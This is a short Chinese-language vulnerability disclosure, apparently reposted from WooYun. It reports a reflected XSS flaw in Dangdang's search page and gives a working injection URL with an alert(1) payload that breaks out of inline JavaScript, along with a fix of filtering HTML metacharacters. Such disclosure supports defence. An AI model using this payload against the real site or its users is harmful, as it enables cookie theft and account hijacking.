简要描述:当当反射型xss,导致可以获取用户cookies。 详细说明:用户提交的搜索关键词有一处未经过滤,直接输出到js代码部分中,导致可以注入自定义js代码: 提交f',true,1);alert(1);//,即 http://searchb.dangdang.com/?key=f',true,1);alert(1);//: <script type="text/javascript"> $(document).ready(function(){ DD_ADSMART.fetchCPM(11348,"new"); DD_ADSMART.fetchCPTSlide(11366,11367,11368,11369,4,"newsearch",false); DD_ADSMART.fetchCPTSlide(11278,11279,11280,11281,4,"newsearch",true); DD_ADSMART.fetchCPTSlide(11391,11392,0,0,4,"multysearch"); DD_ADSMART.fetchCPC(0, 0, 'testf',true,1);alert(1)//', true, 1); s('view','testf%27%2Ctrue%2C1%29%3Balert%281%29%2F%2F','','','','','0_30','0_0_0_n','','',''); }); </script> 漏洞 证明:http://searchb.dangdang.com/?key=testf',true,1);alert(1);// 修复方案:过滤 html 元字符 版权声明:转载请注明来源pentest@乌云
查看更多关于当当反射型xss - 网站安全 - 自学php的详细内容...